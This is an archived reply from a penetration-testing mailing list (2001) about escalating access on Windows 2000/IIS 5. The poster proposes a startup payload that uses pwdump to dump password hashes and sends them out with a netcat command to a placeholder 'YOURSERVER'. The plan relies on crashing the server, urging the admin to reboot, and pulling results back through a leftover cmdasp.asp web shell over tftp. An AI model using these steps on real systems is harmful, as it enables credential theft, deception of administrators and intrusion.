Re: [PEN-TEST] Expand right under Win2K

[Complx1 * <complx1 () HUSHMAIL COM>]

Apologies for my lack of attention to the questions title.
Win2k, hk only works on NT 4.0

How about a theoretical untested scenario then.
Assuming target is win2k , IIS v5.   now depending
on FAT vs NTFS and firewall ACL conditions.. something
along the lines of this might be possible..

Assuming DoS conditions are permitted in the test, what
are thoughts on , wrapping a payload package of pwdump,
netcat, and a batch file.
Write a small batch that dumps the hash to a text file, then
nc -v YOURSERVER port < hashdump.txt

put the payload in the startup method of your choice,  or
perhaps work it into a triggered mechanism (but then unicode
wouldnt do well for that, only the primary intrusion) .

DoS the box, notify the admin to reboot, open your netcat
listener, when the box comes back up, maybe a hash will be
dumped into your netcat port =)  then let the cpu cycles
roll.

ive tested this method several times on a LAN with success.
no unicode however, only registry methods and the like.  so cant
say how a remote test would turn out.

last minute thought.. if you made the pwdump execute on startup
and let it reside on the disk.. you could trigger the hash file
retrieval at will, for instance, maybe you left your cmdasp.asp there
and now the box has been DoS'd, tftp the results of the file
to yourself.
.complx`1



At Wed, 10 Jan 2001 20:26:45 +0100, Tamas Foldi <geza () KAPU HU> wrote:

> 3. HK doesn't work under win2k (it produced permission denied message)
> win2k never has been vulnarable to spoofed LPC port requests